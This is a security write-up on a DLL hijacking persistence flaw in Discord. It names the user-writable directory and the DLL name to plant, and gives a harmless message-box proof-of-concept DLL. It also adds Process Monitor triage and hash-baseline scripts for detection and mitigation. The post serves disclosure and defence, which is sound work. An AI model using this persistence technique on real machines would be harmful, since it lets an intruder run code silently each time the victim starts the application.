DLL Hijacking Persistence Using Discord

How old hacking techniques still work in the present day

bob van der staak
InfoSec Write-ups


After finding a few different persistence methods, I wanted to validate an old DLL hijacking exploit for persistence. I disclosed a DLL hijacking vulnerability in Discord on HackerOne approximately 9 months ago, but sadly it wasn’t accepted as a vulnerability because it requires physical access. Some bug bounty programs do accept such reports, though, and DLL hijacking offers plenty of possibilities.

Exploitation

In short, there is still a DLL hijacking vulnerability in Discord. User-level persistence can be gained by placing a malicious DLL inside the following directory:

%APPDATA%/local/Discord/app-1.0.9004

The DLL name should be: d3d12.dll

It doesn’t require DLL hollowing or anything else fancy: the DLL is simply loaded, so your code just executes.

Creating the DLL

The code is very straightforward. Create a new Visual Studio project from the Dynamic-Link Library (DLL) template and change the DllMain function to the code below, so that every time the DLL is attached to or detached from a process or thread it triggers a pop-up message.

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"      // Visual Studio precompiled header (pulls in windows.h via framework.h)
#include <windows.h>  // explicit include so the file also builds outside the template

// Each case shows which loader notification fired and then breaks. Without the
// break statements the cases fall through, and DLL_PROCESS_ATTACH would show
// all four messages in a row.
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        MessageBox(NULL,
            TEXT("DLL Hijacking verified Process Attach"),
            TEXT("DLL Hijack BVS"),
            MB_ICONERROR | MB_OK);
        break;
    case DLL_THREAD_ATTACH:
        MessageBox(NULL,
            TEXT("DLL Hijacking verified Thread Attach"),
            TEXT("DLL Hijack BVS"),
            MB_ICONERROR | MB_OK);
        break;
    case DLL_THREAD_DETACH:
        MessageBox(NULL,
            TEXT("DLL Hijacking verified Thread Detach"),
            TEXT("DLL Hijack BVS"),
            MB_ICONERROR | MB_OK);
        break;
    case DLL_PROCESS_DETACH:
        MessageBox(NULL,
            TEXT("DLL Hijacking verified Process Detach"),
            TEXT("DLL Hijack BVS"),
            MB_ICONERROR | MB_OK);
        break;
    }
    return TRUE;
}

Now you can create a release build for the required architecture and use it wherever you please, for all future “low hanging fruit” DLL hijacking checks.

Bringing it into action

When you place the crafted DLL inside the folder, the DLL will be loaded the next time the victim starts Discord. In this case the DLL generates a pop-up for easy verification (sometimes it can take a bit of time).

As you can see below, an extra Discord process is created, and it is that process which executes the DLL hijack pop-up.

Cross-referencing the PID in Task Manager and then in Process Explorer, we can find the command line of the process that loaded the DLL. The --type=gpu-process argument fits with d3d12.dll being the Direct3D 12 runtime: it is Discord’s GPU child process, not the main process, that looks for it.

%appdata%\Local\Discord\app-1.0.9007\Discord.exe --type=gpu-process --field-trial-handle=1636,17570466365889041215,795977594926311709,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=5058 --gpu-sub-system-id=695482434 --gpu-revision=161 --gpu-driver-version=31.0.15.2647 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3692 /prefetch:2

However, I couldn’t repeat the exploit by rerunning this Discord command in the terminal.

Finding DLL Hijacking vulnerabilities yourself

To find DLL hijacking vulnerabilities yourself you can use Process Monitor, an advanced monitoring tool for Windows that shows real-time file system and Registry activity. It comes with the Sysinternals suite, a toolkit for all sorts of Windows-related tasks.

See the links below to download Process Monitor individually or the complete suite through the Microsoft Store (which I recommend, because it is updated automatically).

When starting Process Monitor you will be overwhelmed by the number of records, so it is best to pick your targets and add some filters. For finding DLL hijacking vulnerabilities the following filters can be used.

The results to look for are those with the Result value NAME NOT FOUND, which indicates that the file is missing, combined with a Path that ends with .dll, so that only DLL lookups are listed. You can add further filters, for example on the process name, to list only a specific application.

If you open Discord you will see that the file in question, d3d12.dll, is reported as missing from the application directory. That is why it was used for the DLL hijack.
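The filtering described above can also be applied offline to a Process Monitor CSV export, which is convenient when you want to triage many applications at once. The script below is an added example and not part of the original post. It assumes the column names of Process Monitor’s CSV export (Time of Day, Process Name, PID, Operation, Path, Result, Detail), treats any path under C:\Users as user-writable (a triage heuristic, not an access-control check), and runs on a small constructed sample rather than a real capture. It goes one step beyond the post by also flagging whether the same DLL was later found elsewhere (for example in System32): a failed lookup in an earlier search-path directory is still a hijack candidate.

```python
"""Triage a Process Monitor CSV export for DLL-hijacking candidates.

Added example, not from the original post. Applies the post's filters
(Result == NAME NOT FOUND, Path ends with .dll, optional process name) and
reports, per missing DLL, how often it was looked up, whether the directory
looks user-writable, and whether the process found the DLL somewhere else.
"""
import csv
import io
from collections import defaultdict

# Constructed sample in Process Monitor's CSV export layout (not real data).
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","Discord.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Discord\\app-1.0.9004\\d3d12.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","Discord.exe","4120","CreateFile","C:\\Windows\\System32\\d3d12.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.3","Discord.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Discord\\app-1.0.9004\\settings.json","NAME NOT FOUND","Desired Access: Read"
"10:01:03.0","Discord.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Discord\\app-1.0.9004\\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:04.0","notepad.exe","5000","CreateFile","C:\\Windows\\System32\\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:05.0","Discord.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Discord\\app-1.0.9004\\d3d12.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"""


def user_writable_hint(directory):
    """Triage heuristic (assumption of this example): anything under a user
    profile is treated as writable by that user without elevation."""
    return directory.lower().startswith("c:\\users\\")


def find_hijack_candidates(csv_text, process_name=None):
    """Return one dict per (missing DLL path, process), sorted by path."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    if process_name:
        rows = [r for r in rows if r["Process Name"].lower() == process_name.lower()]
    dll_rows = [r for r in rows if r["Path"].lower().endswith(".dll")]

    # DLL names the process did find somewhere (e.g. System32). A miss in the
    # application directory, which is searched first, is still hijackable.
    found_elsewhere = {r["Path"].rpartition("\\")[2].lower()
                       for r in dll_rows if r["Result"] == "SUCCESS"}

    misses = defaultdict(int)
    for r in dll_rows:
        if r["Result"] == "NAME NOT FOUND":
            misses[(r["Path"], r["Process Name"])] += 1

    results = []
    for (path, proc), count in sorted(misses.items()):
        directory, _, name = path.rpartition("\\")
        results.append({
            "dll": name,
            "directory": directory,
            "process": proc,
            "lookups": count,
            "user_writable": user_writable_hint(directory),
            "resolved_elsewhere": name.lower() in found_elsewhere,
        })
    return results


if __name__ == "__main__":
    for hit in find_hijack_candidates(SAMPLE_CSV, process_name="Discord.exe"):
        print(hit)
```

Candidates where user_writable is true and the process runs with higher privileges than the directory owner are the ones worth reporting first; entries that were never resolved anywhere (resolved_elsewhere false) usually mean an optional plug-in or a leftover search path rather than a system DLL.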

For detection / mitigation:

  1. Limit file changes in the %APPDATA%/local/Discord/app-1.0.9004 directory, or place your own DLL there and monitor it for hash changes.
  2. Monitor this specific DLL name and check whether it is loaded into Discord.
  3. For your own applications, make use of hashing and verify that the hash hasn’t changed before loading the file.
  4. It is also recommended not to load files from user-writable locations, especially when the loading process requires higher rights such as SYSTEM.
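Items 1 and 3 above both come down to the same check: record what the application directory is supposed to contain and refuse or alert on anything that differs. The script below is an added example and not part of the original post or of Discord. It baselines the SHA-256 of every file under a directory, diffs a later snapshot against that baseline with DLLs listed first, and pins a single file’s hash before it is used. The directory layout and file contents in demo() are constructed in a temporary folder; nothing here touches a real Discord install.

```python
"""Baseline-and-verify the files of an application directory.

Added example, not from the original post. Implements mitigations 1 and 3:
hash every file under an install directory, diff later snapshots against the
baseline (new/changed/removed files, DLLs first), and verify a file's hash
before it is used.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path (forward slashes) -> sha256 for every file under root."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def compare_baseline(old, new):
    """Classify differences between two baselines. DLLs sort first because a
    new or changed DLL next to the executable is the signal the post describes."""
    def dll_first(names):
        return sorted(names, key=lambda n: (not n.lower().endswith(".dll"), n))
    return {
        "added": dll_first(set(new) - set(old)),
        "removed": dll_first(set(old) - set(new)),
        "modified": dll_first(n for n in set(old) & set(new) if old[n] != new[n]),
    }


def verify_before_load(path, expected_sha256):
    """Mitigation 3: accept a file only if it exists and matches the pinned hash.
    A missing file is a refusal too, since the loader would otherwise fall
    through to the next search-path location."""
    if not os.path.isfile(path):
        return False
    return sha256_file(path) == expected_sha256.lower()


def demo():
    """Baseline a throwaway install directory, then simulate the change the
    post warns about (a new DLL beside the executable, an edited config) and
    return what the diff flags together with the pinned-hash checks."""
    with tempfile.TemporaryDirectory() as root:
        app = os.path.join(root, "app-1.0.9004")  # constructed layout
        os.makedirs(app)
        exe = os.path.join(app, "App.exe")
        with open(exe, "wb") as f:
            f.write(b"MZ constructed placeholder executable")
        with open(os.path.join(app, "settings.json"), "w") as f:
            f.write("{}")

        baseline = build_baseline(root)
        pinned_exe = baseline["app-1.0.9004/App.exe"]
        before = verify_before_load(exe, pinned_exe)

        # Simulated change: a DLL appears in the application directory and a
        # config file is edited. The executable itself is untouched.
        with open(os.path.join(app, "d3d12.dll"), "wb") as f:
            f.write(b"MZ constructed placeholder dll")
        with open(os.path.join(app, "settings.json"), "w") as f:
            f.write('{"changed": true}')

        diff = compare_baseline(baseline, build_baseline(root))
        diff["exe_verified_before"] = before
        diff["exe_verified_after"] = verify_before_load(exe, pinned_exe)
        return diff


if __name__ == "__main__":
    print(demo())
```

For a real deployment the baseline would be written once from a known-good install (ideally right after the installer runs) and stored somewhere the user cannot modify; rerunning compare_baseline on a schedule, or on a file-change event for the directory, gives you item 1, and calling verify_before_load from your own loader gives you item 3.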

Conclusion

It is interesting how easily someone can gain persistence by making use of DLL hijacking. There are numerous applications with this vulnerability, and it is hard to validate them all.
It is shocking how many DLLs are loaded incorrectly once you monitor them in Process Monitor.
If you want to discuss anything related to infosec I’m on LinkedIn: https://www.linkedin.com/in/bobvanderstaak/
